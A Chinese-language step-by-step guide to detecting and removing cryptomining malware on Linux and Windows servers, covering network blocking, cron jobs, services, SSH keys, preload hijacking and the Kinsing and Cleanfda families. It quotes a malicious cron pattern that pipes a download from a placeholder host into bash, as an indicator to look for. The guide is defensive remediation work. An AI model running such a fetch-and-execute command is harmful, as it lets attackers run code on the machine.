挖矿病毒急救手册：从发现到根除的保姆级指南

最近某公司服务器CPU突然飙升至99%，排查发现是挖矿病毒在作祟。这类病毒会占用服务器资源进行加密货币挖矿，导致业务卡顿甚至瘫痪。本文将一步步教你识别和清除挖矿病毒！

挖矿病毒通常通过弱密码或漏洞入侵，在后台悄悄运行消耗资源。它们常伪装成系统文件，并通过多种方式维持运行。

1. Linux系统处置流程

（1）第一步：断网阻传播

发现异常后，先切断病毒与外界的联系：

# 查看异常网络连接（重点关注IP地址陌生的连接）
netstat -antp | grep ESTABLISHED

# 封禁可疑IP（将1.2.3.4替换为实际可疑IP）
iptables -A INPUT -s 1.2.3.4 -j DROP           # 禁止该IP访问本机
iptables -A OUTPUT -d 1.2.3.4 -j DROP      # 禁止本机访问该IP

（2）清除定时任务

病毒常设置定时任务自我恢复：

# 检查当前用户的定时任务
crontab -l

# 检查系统级定时任务（重点路径）
ls /etc/cron.*/* /var/spool/cron/*

发现可疑任务（如curl http://恶意地址 | bash）立即删除：

crontab -e      # 编辑当前用户任务
# 或直接删除文件：rm /etc/cron.d/suspicious_task

（3）检查自启动服务

病毒可能注册为系统服务：

# 查看所有开机自启服务
systemctl list-unit-files --state=enabled

# 检查可疑服务文件
ls /etc/systemd/system/*.service

发现异常服务（如名称随机的.service文件）后：

systemctl stop bad-service      # 停止服务
systemctl disable bad-service      # 禁用自启
rm /etc/systemd/system/bad-service.service      # 删除配置文件

（4）检查SSH后门

病毒可能添加免密登录密钥：

# 检查授权密钥文件
cat ~/.ssh/authorized_keys      # 当前用户
cat /root/.ssh/authorized_keys      # root用户

删除所有不认识的公钥（形如ssh-rsa AAAA...的文本）

（5）解除系统命令劫持

病毒可能劫持常用命令：

# 检查预加载劫持
cat /etc/ld.so.preload  # 正常应为空

# 解除劫持
echo "" > /etc/ld.so.preload

（6）排查可疑账户

# 查看所有系统账户
cat /etc/passwd | cut -d: -f1

# 检查新增账户日志
grep "useradd" /var/log/auth.log

发现异常账户（如hacker）后删除：

userdel -r hacker      # 删除账户及家目录

（7）清理病毒进程

top      # 按P按CPU排序，记录高占用PID
ls -l /proc/1234/exe     # 查看PID=1234的进程路径
kill -9 1234      # 结束进程
rm -f /path/to/virus      # 删除病毒文件

2. 常见挖矿病毒专杀

（1）Cleanfda病毒

特征：篡改系统命令

# 恢复被修改的命令
cp /bin/ps.original /bin/ps

# 删除病毒文件
rm -f /etc/upat.sh

（2）Kinsing家族病毒

特征：计划任务含gi.sh

# 清除恶意任务
grep -rl "gi.sh" /etc/cron* | xargs rm -f

# 删除劫持文件
rm /lib/systemd/system/bot.service

3. Windows系统处置

（1）定位病毒进程

打开任务管理器 → 按CPU排序 → 记录高占用进程

（2）分析进程详情

管理员运行PowerShell：

# 查看进程详细信息
Get-WmiObject Win32_Process -Filter "ProcessId=1234" | Select CommandLine

（3）终止并删除

Stop-Process -Id 1234 -Force
Remove-Item "C:\恶意路径\virus.exe" -Force

（4）检查定时任务

schtasks /query /fo TABLE  # 查看所有任务
schtasks /delete /tn "恶意任务名" /f  # 删除任务

（5）检查Hosts文件

打开C:\Windows\System32\drivers\etc\hosts

删除包含矿池地址的行（如pool.minexmr.com）

总结

挖矿病毒处置三步走：

• 1. 断网：阻断病毒通信
• 2. 清源：删除病毒文件/任务/账户
• 3. 加固：修复漏洞加强防护